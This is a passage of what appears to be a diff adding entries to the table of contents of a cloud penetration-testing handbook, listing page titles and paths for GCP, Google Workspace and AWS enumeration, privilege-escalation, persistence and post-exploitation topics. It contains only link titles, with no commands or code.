Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md) + - [GCP - Cloud Functions Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md) + - [GCP - Cloud Run Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md) + - [GCP - Cloud Shell Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md) + - [GCP - Cloud SQL Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md) + - [GCP - Compute Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md) + - [GCP - Filestore Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md) + - [GCP - IAM Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md) + - [GCP - KMS Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md) + - [GCP - Logging Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md) + - [GCP - Monitoring Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md) + - [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md) + - [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md) + - [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md) + - [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md) + - [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md) + - [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md) + - [GCP - Apikeys Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md) + - [GCP - AppEngine Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md) + - [GCP - Artifact Registry Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md) + - [GCP - Batch Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md) + - [GCP - BigQuery Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md) + - [GCP - ClientAuthConfig Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md) + - [GCP - Cloudbuild Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md) + - [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md) + - [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md) + - [GCP - Cloud Scheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md) + - [GCP - Compute Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md) + - [GCP - Add Custom SSH Metadata](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md) + - [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md) + - [GCP - Container Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md) + - [GCP - Deploymentmaneger Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md) + - [GCP - IAM Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md) + - [GCP - KMS Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md) + - [GCP - Orgpolicy Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md) + - [GCP - Pubsub Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md) + - [GCP - Resourcemanager Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md) + - [GCP - Run Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md) + - [GCP - Secretmanager Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md) + - [GCP - Serviceusage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md) + - [GCP - Sourcerepos Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md) + - [GCP - Storage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md) + - [GCP - Workflows Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md) + - [GCP - Generic Permissions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md) + - [GCP - Network Docker Escape](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md) + - [GCP - local privilege escalation ssh pivoting](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md) + - [GCP - Persistence](pentesting-cloud/gcp-security/gcp-persistence/README.md) + - [GCP - API Keys Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md) + - [GCP - App Engine Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md) + - [GCP - Artifact Registry Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md) + - [GCP - BigQuery Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md) + - [GCP - Cloud Functions Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md) + - [GCP - Cloud Run Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md) + - [GCP - Cloud Shell Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md) + - [GCP - Cloud SQL Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md) + - [GCP - Compute Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md) + - [GCP - Dataflow Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md) + - [GCP - Filestore Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md) + - [GCP - Logging Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md) + - [GCP - Secret Manager Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md) + - [GCP - Storage Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md) + - [GCP - Token Persistance](pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md) + - [GCP - Services](pentesting-cloud/gcp-security/gcp-services/README.md) + - [GCP - AI Platform Enum](pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md) + - [GCP - API Keys Enum](pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md) + - [GCP - App Engine Enum](pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md) + - [GCP - Artifact Registry Enum](pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md) + - [GCP - Batch Enum](pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md) + - [GCP - Bigquery Enum](pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md) + - [GCP - Bigtable Enum](pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md) + - [GCP - Cloud Build Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md) + - [GCP - Cloud Functions Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md) + - [GCP - Cloud Run Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md) + - [GCP - Cloud Shell Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md) + - [GCP - Cloud SQL Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md) + - [GCP - Cloud Scheduler Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md) + - [GCP - Compute Enum](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md) + - [GCP - Compute Instances](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md) + - [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md) + - [GCP - Composer Enum](pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md) + - [GCP - Containers & GKE Enum](pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md) + - [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md) + - [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md) + - [GCP - Firebase Enum](pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md) + - [GCP - Firestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md) + - [GCP - IAM, Principals & Org Policies Enum](pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md) + - [GCP - KMS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md) + - [GCP - Logging Enum](pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md) + - [GCP - Memorystore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md) + - [GCP - Monitoring Enum](pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md) + - [GCP - Pub/Sub Enum](pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md) + - [GCP - Secrets Manager Enum](pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md) + - [GCP - Security Enum](pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md) + - [GCP - Source Repositories Enum](pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md) + - [GCP - Spanner Enum](pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md) + - [GCP - Stackdriver Enum](pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md) + - [GCP - Storage Enum](pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md) + - [GCP - Workflows Enum](pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md) + - [GCP <--> Workspace Pivoting](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md) + - [GCP - Understanding Domain-Wide Delegation](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md) + - [GCP - Unauthenticated Enum & Access](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md) + - [GCP - API Keys Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md) + - [GCP - App Engine Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md) + - [GCP - Artifact Registry Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md) + - [GCP - Cloud Build Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md) + - [GCP - Cloud Functions Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md) + - [GCP - Cloud Run Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md) + - [GCP - Cloud SQL Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md) + - [GCP - Compute Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md) + - [GCP - IAM, Principals & Org Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md) + - [GCP - Source Repositories Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md) + - [GCP - Storage Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md) + - [GCP - Public Buckets Privilege Escalation](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md) +- [GWS - Workspace Pentesting](pentesting-cloud/workspace-security/README.md) + - [GWS - Post Exploitation](pentesting-cloud/workspace-security/gws-post-exploitation.md) + - [GWS - Persistence](pentesting-cloud/workspace-security/gws-persistence.md) + - [GWS - Workspace Sync Attacks (GCPW, GCDS, GPS, Directory Sync with AD & EntraID)](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md) + - [GWS - Admin Directory Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md) + - [GCDS - Google Cloud Directory Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md) + - [GCPW - Google Credential Provider for Windows](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md) + - [GPS - Google Password Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md) + - [GWS - Google Platforms Phishing](pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md) + - [GWS - App Scripts](pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md) +- [AWS Pentesting](pentesting-cloud/aws-security/README.md) + - [AWS - Basic Information](pentesting-cloud/aws-security/aws-basic-information/README.md) + - [AWS - Federation Abuse](pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md) + - [AWS - Permissions for a Pentest](pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md) + - [AWS - Persistence](pentesting-cloud/aws-security/aws-persistence/README.md) + - [AWS - API Gateway Persistence](pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md) + - [AWS - Cognito Persistence](pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md) + - [AWS - DynamoDB Persistence](pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md) + - [AWS - EC2 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md) + - [AWS - ECR Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md) + - [AWS - ECS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md) + - [AWS - Elastic Beanstalk Persistence](pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md) + - [AWS - EFS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md) + - [AWS - IAM Persistence](pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md) + - [AWS - KMS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md) + - [AWS - Lambda Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md) + - [AWS - Abusing Lambda Extensions](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md) + - [AWS - Lambda Layers Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md) + - [AWS - Lightsail Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md) + - [AWS - RDS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md) + - [AWS - S3 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md) + - [AWS - SNS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md) + - [AWS - Secrets Manager Persistence](pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md) + - [AWS - SQS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md) + - [AWS - SSM Perssitence](pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md) + - [AWS - Step Functions Persistence](pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md) + - [AWS - STS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md) + - [AWS - Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/README.md) + - [AWS - API Gateway Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md) + - [AWS - CloudFront Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md) + - [AWS - CodeBuild Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md) + - [AWS Codebuild - Token Leakage](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md) + - [AWS - Control Tower Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md) + - [AWS - DLM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md) + - [AWS - DynamoDB Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md) + - [AWS - EC2, EBS, SSM & VPC Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md) + - [AWS - EBS Snapshot Dump](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md) + - [AWS - Malicious VPC Mirror](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md) + - [AWS - ECR Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md) + - [AWS - ECS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md) + - [AWS - EFS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md) + - [AWS - EKS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md) + - [AWS - Elastic Beanstalk Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md) + - [AWS - IAM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md) + - [AWS - KMS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md) + - [AWS - Lambda Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md) + - [AWS - Steal Lambda Requests](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md) + - [AWS - Lightsail Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md) + - [AWS - Organizations Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md) + - [AWS - RDS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md) + - [AWS - S3 Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md) + - [AWS - Secrets Manager Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md) + - [AWS - SES Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md) + - [AWS - SNS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md) + - [AWS - SQS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md) + - [AWS - SSO & identitystore Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md) + - [AWS - Step Functions Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md) + - [AWS - STS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md) + - [AWS - VPN Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md) + - [AWS - Privilege Escalation](pentesting-cloud/aws-security/aws-privilege-escalation/README.md) + - [AWS - Apigateway Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md) + - [AWS - Chime Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md) + - [AWS - Codebuild Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md) + - [AWS - Codepipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md) + - [AWS - Codestar Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md) + - [codestar:CreateProject, codestar:AssociateTeamMember](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md) + - [iam:PassRole, codestar:CreateProject](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md) + - [AWS - Cloudformation Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md) + - [iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md) + - [AWS - Cognito Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md) + - [AWS - Datapipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md) + - [AWS - Directory Services Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md) + - [AWS - DynamoDB Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md) + - [AWS - EBS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md) + - [AWS - EC2 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md) + - [AWS - ECR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md) + - [AWS - ECS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md) + - [AWS - EFS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md) + - [AWS - Elastic Beanstalk Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md) + - [AWS - EMR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md) + - [AWS - EventBridge Scheduler Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md) + - [AWS - Gamelift](pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md) + - [AWS - Glue Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md) + - [AWS - IAM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md) + - [AWS - KMS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md) + - [AWS - Lambda Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md) + - [AWS - Lightsail Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md) + - [AWS - Mediapackage Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md) + - [AWS - MQ Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md) + - [AWS - MSK Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md) + - [AWS - RDS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md) + - [AWS - Redshift Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md) + - [AWS - Route53 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md) + - [AWS - SNS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md) + - [AWS - SQS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md) + - [AWS - SSO & identitystore Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md) + - [AWS - Organizations Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md) + - [AWS - S3 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md) + - [AWS - Sagemaker Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md) + - [AWS - Secrets Manager Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md) + - [AWS - SSM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md) + - [AWS - Step Functions Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md) + - [AWS - STS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md) + - [AWS - WorkDocs Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md) + - [AWS - Services](pentesting-cloud/aws-security/aws-services/README.md) + - [AWS - Security & Detection Services](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md) + - [AWS - CloudTrail Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md) + - [AWS - CloudWatch Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md) + - [AWS - Config Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md) + - [AWS - Control Tower Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md) + - [AWS - Cost Explorer Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md) + - [AWS - Detective Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md) + - [AWS - Firewall Manager Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md) + - [AWS - GuardDuty Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md) + - [AWS - Inspector Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md) + - [AWS - Macie Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md) + - [AWS - Security Hub Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md) + - [AWS - Shield Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md) + - [AWS - Trusted Advisor Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md) + - [AWS - WAF Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md) + - [AWS - API Gateway Enum](pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md) + - [AWS - Certificate Manager (ACM) & Private Certificate Authority (PCA)](pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md) + - [AWS - CloudFormation & Codestar Enum](pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md) + - [AWS - CloudHSM Enum](pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md) + - [AWS - CloudFront Enum](pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md) + - [AWS - Codebuild Enum](pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md) + - [AWS - Cognito Enum](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md) + - [Cognito Identity Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md) + - [Cognito User Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md) + - [AWS - DataPipeline, CodePipeline & CodeCommit Enum](pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md) + - [AWS - Directory Services / WorkDocs Enum](pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md) + - [AWS - DocumentDB Enum](pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md) + - [AWS - DynamoDB 